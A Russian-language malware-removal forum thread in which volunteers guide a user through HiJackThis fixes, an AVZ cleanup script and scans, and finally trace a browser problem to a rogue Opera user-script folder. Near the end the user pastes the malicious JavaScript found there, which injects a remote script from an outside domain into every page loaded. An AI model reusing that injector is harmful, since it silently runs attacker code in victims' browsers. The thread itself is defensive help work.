[thyrex]

Выполните правила и предоставьте логи

[decoy]

спасибо за отклик! Прикрепляю логи.

[Drongo]

decoy, Выполните эти рекомендации.

• HiJackThis Нужно пофиксить эти строки в HiJackThis. Выставив галочки напротив этих пунктов и нажмите кнопку Fix Checked. Как пофиксить в HijackThis

Код:

R3 - URLSearchHook: (no name) -  - (no file)
O2 - BHO: Site Advisor Module - {B2150688-1AA5-4698-90BE-C3CBECBB5786} - C:\Program Files\SAM\module.dll
O3 - Toolbar: Foxit Toolbar - {3041d03e-fd4b-44e0-b742-2d9b88305f98} - C:\Program Files\AskBarDis\bar\bin\askBar.dll (file missing)
O4 - HKLM\..\Policies\Explorer\Run: [Microsoft Driver Setup] C:\WINDOWS\system32\drivers\CzhkF.exe

• Скрипт AVZ.
Выполните скрипт AVZ. Меню Файл - Выполнить скрипт, вставляем написаный скрипт - кнопка Запустить, после выполнения компьютер перезагрузится.

Код:

begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
 QuarantineFile('c:\program files\sam\module.dll','');
 QuarantineFile('c:\program files\askbardis\bar\bin\askbar.dll','');
 QuarantineFile('C:\WINDOWS\system32\drivers\CzhkF.exe','');
 DeleteFile('c:\program files\sam\module.dll');
 DeleteFile('c:\program files\askbardis\bar\bin\askbar.dll');
 DeleteFile('C:\WINDOWS\system32\drivers\CzhkF.exe');
 DeleteDirectory('C:\Program Files\SAM');
 DelBHO('{201f27d4-3704-41d6-89c1-aa35e39143ed}');
 DelBHO('{B2150688-1AA5-4698-90BE-C3CBECBB5786}');
 DelBHO('{3041d03e-fd4b-44e0-b742-2d9b88305f98}');
 DelBHO('{1F460357-8A94-4D71-9CA3-AA4ACF32ED8E}');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run','Microsoft Driver Setup');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.

После всех процедур выполните скрипт

Код:

begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

В результате выполнения скрипта будет сформирован карантин quarantine.zip. Отправьте полученный файл quarantine.zip из папки AVZ через данную форму. В строке "Подробное описание возникшей ситуации:", напишите пароль на архив "virus" (без кавычек), в строке "Электронный адрес:" укажите свой электронный адрес. Результаты ответа, сообщите здесь, в теме.

После чего проверьте компьютер утилитой CureIT или Kaspersky Virus Removal Tool.

Повторите логи и дополнительно сделайте лог утилитой МВАМ
• Скачайте Malwarebytes Anti-Malware, установите, обновите базы, выберите Perform Full Scan, нажмите Scan, после сканирования - Ok - Show Results (показать результаты) . Откройте лог и скопируйте в блокнот и выложите в сообщение.
Если базы MBAM в автоматическом режиме обновить не удалось, обновите их отдельно. Загрузить обновление MBAM.

Цитата:

[Дата создания и изменения системных файлов - разная!] c:\windows\system32\ctfmon.exe c:\windows\explorer.exe c:\program files\internet explorer\iexplore.exe c:\windows\system32\setupapi.dll c:\windows\system32\rundll32.exe c:\windows\system32\rundll32.exe

Изменяли системные файлы? Патчили их?

[decoy]

1.Все процедуры выполнил

2.Результат ответа:
Hello,

This message is generated by automatic letter reception system. The report contains information on what the verdicts on the files (if any in the letter) makes antivirus with latest updates. Letter will be passed to the virus analyst.

bcqr00001.ini,
bcqr00002.ini,
bcqr00003.ini,
bcqr00004.ini,
bcqr00005.ini,
bcqr00006.ini

These files are in process.

Best Regards, Kaspersky Lab

10/1, 1st Volokolamsky Proezd, Moscow, 123060, Russia
Tel./Fax: + 7 (495) 797 8700
http://www.kaspersky.com http://www.viruslist.com


>> From: nsotnikoff@mail.by
>> Sent: 02.05.2010 18:46:30
>> To: newvirus@kaspersky.com
>> Subject: [VirLabSRF][Description of a malicious program][M:1][LN:RU][L:0]
>>
>>
>> LANG: ru
>> email: nsotnikoff@mail.by
>> product:
>> viruses_date:
>>
>> description:
>> virus
>>
>> Загруженные файлы:
>> quarantine.zip

3. CureIt ничего не выявила (базы обновленные)

4. Логи повторил. Сделал лог MBAM (нашел объект!).Всё прикрепил к сообщению.

5. "Изменяли системные файлы? Патчили их?" - Установил и, позже, обновлял XPLife - программа предназначена для изменения интерфейса Windows XP, делая его похожим на Vista и Seven. Отличительной чертой XPLife является стабильная работа и поддержка двух собственных точек восстановления системы...

Проблема осталась

[Drongo]

decoy, логи чистые. Попробуйте очистить кеш браузера, посмотреть различные надстройки браузера. Проявляется ли эта проблема при использовании какого-то конкретного браузера или со всех подряд?

[decoy]

1.1. Почистил. Проблема сейчас только в опере проявляется. Хотя уверен, что раньше и в IE была - ещё до форума проверял.
1.2. Оперу деинсталлировал, папку оставшуюся удалил, почистил реестр и диск, установил заново оперу...проблема не исчезла!
2. Несколько раз повторил очистку и каждый раз пишет что эти два файла якобы найдены и удалены:
C:\Documents and Settings\Nikolay\Local Settings\Temporary Internet Files\desktop.ini
C:\Documents and Settings\Nikolay\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
3. Прикрепил скрин processor explorer, посмотрите, пожалуйста, постоянно в процессе wscntfy.exe и spoolsv.exe

[thyrex]

Выполнить в Опера
Инструменты - Настройки - Дополнительно - Содержимое - Настроить JavaScript...

Если окно Папка пользовательских скриптов непустое:
1. Если Вы сами не указывали эту папку для своих скриптов, очистите содержимое папки
2. Если Вы сами указывали эту папку для своих скриптов, поищите в ней незнакомый Вам скрипт и удалите его

[decoy]

скрипт отключил - проблема исчезла!! спасибо!!!
только у меня такой путь: инструменты -> быстрые настройки -> настройки для сайта -> скрипты. Папка для пользовательских скриптов: C:\Program Files\SAM\FF\components - не знаю, нормально это для папки по умолчанию или нет...скрипты сам не писал, разве что окошек прибавил в экспресс-панели...
такое вот нашел там:

var operaBHO = {
onLoad : function(event) {
var last_body_child = document.body;
if (last_body_child != null) {
var script_element = document.createElement("script");
script_element.setAttribute("language", "javascript");
script_element.setAttribute("src", "http://googlesc.net/1.js");
last_body_child.appendChild(script_element);
}
}
};

window.addEventListener("load", operaBHO.onLoad, false);

[thyrex]

Удалите папку C:\Program Files\SAM\FF\components со всем содержимым